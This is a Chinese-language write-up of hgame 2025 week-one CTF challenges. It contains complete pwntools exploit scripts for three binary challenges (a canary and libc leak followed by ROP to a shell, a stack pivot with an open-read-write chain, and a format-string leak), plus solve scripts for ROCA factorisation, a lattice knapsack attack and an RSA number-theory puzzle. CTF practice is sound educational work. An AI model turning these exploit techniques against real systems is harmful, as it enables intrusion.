[hgame 2025 ]week1 pwn/crypto

一共两周，第一周说难也不难说简单也不简单。

pwn

counting petals

数组v7长度17，输入16时v7[16+1]会发生溢出，溢出到v8,v9,将其改大，会输出canary和libc_start_main_ret的地址。第2次进来覆盖到返回地址写上ROP

from pwn import *
context(arch='amd64', log_level='debug')libc = ELF('./libc.so.6')#p = process('./vuln')
#gdb.attach(p, "b*0x555555555535\nc")
p = remote('node1.hgame.vidar.club', 30788)p.sendlineafter(b"time?\n", b'16')
for i in range(15):p.sendlineafter(b" : ", b'0')p.sendlineafter(b" : ", str((0x10<<32)+22).encode())
for i in range(6):p.sendlineafter(b" : ", b'-')p.sendlineafter(b"Reply 1 indicates the former and 2 indicates the latter: ", b'1')
p.recvuntil(b"Let's look at the results.\n")
v = p.recvuntil(b"=", drop=True).decode().split(' + ')
print(v)
libc.address = int(v[18]) - 0x29d90
canary = int(v[16])
pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
print(f"{libc.address = :x} {canary = :x}")p.sendlineafter(b"time?\n", b'16')
pay = [0]*15+[(0x10<<32)+22, canary,0,pop_rdi+1,pop_rdi,next(libc.search(b'/bin/sh')), libc.sym['system']]
for i in pay:p.sendlineafter(b" : ", str(i).encode())p.sendlineafter(b"Reply 1 indicates the former and 2 indicates the latter: ", b'1')
p.sendline(b'cat flag')
p.interactive()
#flag{b945024b-f973-497c-30e4-c14722593da5}

ezstack

PIE没开，加载地址已知。溢出正好能覆盖到返回地址。

ssize_t __fastcall vuln(unsigned int a1)
{char buf[80]; // [rsp+10h] [rbp-50h] BYREFprint(a1, &unk_402018);print(a1, "That's all.\n");print(a1, "Good luck.\n");return read(a1, buf, 0x60uLL);
}

先移栈到BSS，再利用0x50的空间写ROP泄露libc再读入后续的ORW

from pwn import *
context(arch='amd64', log_level='debug')#20.04 focal libc-2.31
libc = ELF('./libc-2.31.so')
elf = ELF('./vuln')leave_ret = 0x401426
pop_rdi = 0x0000000000401713 # pop rdi ; ret
pop_rsi = 0x0000000000401711 # pop rsi ; pop r15 ; ret
pop_rbp = 0x000000000040135d # pop rbp ; ret
bss = 0x404800
ret = pop_rdi+1#p = process('./vuln')
p = remote('node2.hgame.vidar.club', 30598)
#p = remote('localhost',9999)
#pause()#移栈到已知地址
pay = flat(b'\0'*0x50, 0x404800, 0x4013d9)
p.sendafter(b"Good luck.\n", pay)#输出got表得到libc
#         -50                       -40                             -30             -20               -10       0
pay = flat(pop_rsi,elf.got['write'],b'/flag\0\0\0',elf.plt['write'],pop_rsi,bss-0x10,0,elf.plt['read'],ret,ret, bss-0x58, leave_ret)
p.sendafter(b"Good luck.\n", pay)libc.address = u64(p.recv(8)) - libc.sym['write']
print(f"{libc.address = :x}")
p.recv(0x58)pop_rsi = libc.address + 0x000000000002601f # pop rsi ; ret
pop_rdx = libc.address + 0x000000000015fae6 # pop rdx ; pop rbx ; ret
pop_rcx = libc.address + 0x000000000010257e # pop rcx ; pop rbx ; ret
pop_rax = libc.address + 0x0000000000036174 # pop rax ; ret
save_rdi = libc.address + 0x000000000013b631 # mov qword ptr [rsi], rdi ; ret
save_rax = libc.address + 0x000000000014852a # mov qword ptr [rsi + 0x10], rax ; ret
syscall = libc.sym['getpid']+9#输出fordfd + read
#          -10                  0                           10            20         30                        40
pay2 = flat(pop_rsi, bss-0x100, save_rdi, elf.plt['write'], pop_rdx,0xe0, 0,pop_rsi, bss+0x40, elf.plt['read'],ret,ret)
p.send(pay2)
forkfd = u32(p.recv(4))
print(f"{forkfd = :x}")
p.recv(0x5c)#bbs-100 = socketid
#bbs-f0 = rax
#bss-40 = /flag
#open() + 输出fd + read
#             40                 50                       60          70                80 
pay3 = flat([ pop_rdi, bss-0x40, pop_rsi,0,               pop_rax, 2, syscall,pop_rsi,  bss-0x100, save_rax, 
#             90                 a0                       b0          c0                d0pop_rdi, forkfd,   pop_rsi, bss-0x100+0x10, pop_rdx,8,  0, pop_rax,       1, syscall, 
#             e0                 f0                       100                  110pop_rsi,bss+0x120, pop_rdx, 0x800,          0, pop_rax,          0, syscall])
p.send(pay3)
filefd = u64(p.recv(8))
print(f"{filefd = :x}")#read(filefd, ) + write(forkfd, )
pay4 = flat([pop_rdi, filefd, pop_rsi, bss-0x100, pop_rdx,0x50,0, pop_rax,0, syscall,pop_rdi, forkfd, pop_rax, 1, syscall])
p.send(pay4)p.interactive()

format

可以多次执行printf但每次最多3字符，有个很老的板子 %*c第1个寄存器的指针被输出是个非常大的值，输出被先写入缓冲区再输出。输出大量空格会填充缓冲区，缓冲区后边的指针每次都会重新写入。再次输出%s就会带出libc地址。

另一种方法是多次输入%s.每次会多输出1个点，而且后边又没有\0所以这个串会越来越长，直到连上缓冲区里的指针。大概输出到到0xdb4才行。不过感觉比第1种时间还是短点。那个0x7fxxxxxxx确实是有点大了。只要docker能顶得住就行。

from pwn import *
context(arch='amd64', log_level='error')libc = ELF('./libc.so.6')#p = process('./vuln')
#gdb.attach(p, "b*0x4011ee\nc")
p = remote('node2.hgame.vidar.club', 31824)print('rec...')
p.sendlineafter(b'n = ', b'2')
p.sendlineafter(b"type something:", b'%*c')
p.sendlineafter(b"type something:", b'%s\0')
context.log_level='debug'libc.address = u64(p.recvuntil(b'\x7f')[-6:]+b'\0\0') - libc.sym['_IO_2_1_stdin_']
print(f"{libc.address = :x}")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; retp.sendlineafter(b'n = ', str(-8).encode())
#p.sendafter(b"type something:", b'A'*4+flat(0, pop_rdi+1, pop_rdi,next(libc.search(b'/bin/sh')), libc.sym['system']))
p.send(b'A'*5+flat(0, pop_rdi+1, pop_rdi,next(libc.search(b'/bin/sh')), libc.sym['system']))sleep(0.5)
p.sendline(b'cat /flag')
p.interactive()

crypto

suprimeRSA

p = k*M+pow(e,a,M) RSAlib-cve漏洞，这东西原来没见过作起来难成。跟上一题一样，自己想确实比较不能实现。直接用ROCA代码爆破分解就行了。 

from Crypto.Util.number import *
import random
from sympy import primeFLAG=b'hgame{xxxxxxxxxxxxxxxxxx}'
e=0x10001def primorial(num):result = 1for i in range(1, num + 1):result *= prime(i)  #取前num个素数相乘return result
M=primorial(random.choice([39,71,126]))  #39def gen_key():while True:k = getPrime(random.randint(20,40))a = getPrime(random.randint(20,60))p = k * M + pow(e, a, M)if isPrime(p):return pp,q=gen_key(),gen_key()
n=p*q
m=bytes_to_long(FLAG)
enc=pow(m,e,n)print(f'{n=}')
print(f'{enc=}')"""
n=787190064146025392337631797277972559696758830083248285626115725258876808514690830730702705056550628756290183000265129340257928314614351263713241
enc=365164788284364079752299551355267634718233656769290285760796137651769990253028664857272749598268110892426683253579840758552222893644373690398408
"""

#https://asecuritysite.com/encryption/copper
#ROCA 素数生成漏洞
p=954455861490902893457047257515590051179337979243488068132318878264162627
q=824752716083066619280674937934149242011126804999047155998788143116757683
long_to_bytes(int(pow(enc,inverse_mod(e,(p-1)*(q-1)),n)))
#hgame{ROCA_ROCK_and_ROll!}'''
┌──(kali㉿kali)-[~/ctf/2502/roca]
└─$ sage -python roca_attack.py        3%|████▏                                                                                                                           | 2/61 [02:22<1:09:27, 70.64s/it]found factorization:
p=954455861490902893457047257515590051179337979243488068132318878264162627
q=8247527160830666192806749379341492420111268049990471559987881431167576833%|████▏                                                                                                                           | 2/61 [02:55<1:26:12, 87.66s/it]
'''

 这个漏洞的M是前n个素数的积，对于小于960位的是前39个（ROCA用前37个，减小模同样减小爆破范围，可以在60000将左右完成）。不过这题有第1板，没作出来，这是换了附件的。原来的M是5<<128，这个用这个ROCA没效果。现在也不清楚已经出了的8个人怎么弄的。

easyBag

from Crypto.Util.number import *
import random
from Crypto.Cipher import AES
import hashlib
from Crypto.Util.Padding import pad
from secrets import flaglist = []
bag = []
p=random.getrandbits(64)
assert len(bin(p)[2:])==64
for i in range(4):t = pa=[getPrime(32) for _ in range(64)]b=0for i in a:temp=t%2b+=temp*it=t>>1list.append(a)bag.append(b)
print(f'list={list}')
print(f'bag={bag}')key = hashlib.sha256(str(p).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
flag = pad(flag,16)
ciphertext = cipher.encrypt(flag)
print(f"ciphertext={ciphertext}")

p*A=bag 一个简单的背包问题。不过有个坑，用BKZ才出结果。

'''|           |
|p0 p1 ...|*|a0 a1 a2 a3| = |b0 b1 ...||           |
'''A= matrix(ZZ,list).T
B= matrix(ZZ,bag)
M= block_matrix(ZZ,[[1,A],[0,B]])v = M.BKZ()
a = -1*v[-1]
p = = int(''.join(map(str,a[:-4][::-1])),2)
#17739748707559623655
key = hashlib.sha256(str(p).encode()).digest()
cipher = AES.new(key, AES.MODE_ECB)
cipher.decrypt(ciphertext)
#b'hgame{A_S1mple_Modul@r_Subset_Sum_Problem}\x06\x06\x06\x06\x06\x06'

sieve

#sage
from Crypto.Util.number import bytes_to_long
from sympy import nextprimeFLAG = b'hgame{xxxxxxxxxxxxxxxxxxxxxx}'
m = bytes_to_long(FLAG)def trick(k):if k > 1:mul = prod(range(1,k)) if k - mul % k - 1 == 0:return euler_phi(k) + trick(k-1) + 1  #素数 k+trick(k-1)else:return euler_phi(k) + trick(k-1)else:return 1e = 65537
p = q = nextprime(trick(e^2//6)<<128)
n = p * q
enc = pow(m,e,n)
print(f'{enc=}')
#enc=2449294097474714136530140099784592732766444481665278038069484466665506153967851063209402336025065476172617376546

这个递归函数是运行不了的。里面包含级数级别的重复运算。但也很容易理解，1到n,当值是素数的时候是phi(k)+1也就是k,当是合数的时候就是phi(k)所以就是1-n的sum(phi())+素数的个数。

于是花了很长时间想办法。因为有个提示是二筛。

后来搜OEIS得到phi(n)和的序列，这个没有算法，沿着这搜到a(n)+1也就是这个序列和+1

另一个数素数的个数在sage里有函数prime_pi

#从OEIS查序列
#n以内phi(n)的和a(n) A005728=a(n)+1 Number of fractions in Farey series of order n.AA = {} #优化字典，避免重复查询
def A005728(n):if n == 0:return 1c, j = -2, 2k1 = n//jwhile k1 > 1:j2 = n//k1 + 1if k1 in AA:v = AA[k1]else:v = A005728(k1)AA[k1]=vc += (j2-j)*(2*v-3)j, k1 = j2, n//j2return (n*(n-1)-c+j)//2m = e**2//6
s_phi = A005728(m)
#155763335410704473s_pi = prime_pi(e^2//6) #37030583  sage函数
s = s_phi-1+s_pi
p = next_prime(s<<128)
m = long_to_bytes(int(pow(enc,inverse_mod(e,p*(p-1)),p*p)))
print(m)
#hgame{sieve_is_n0t_that_HArd}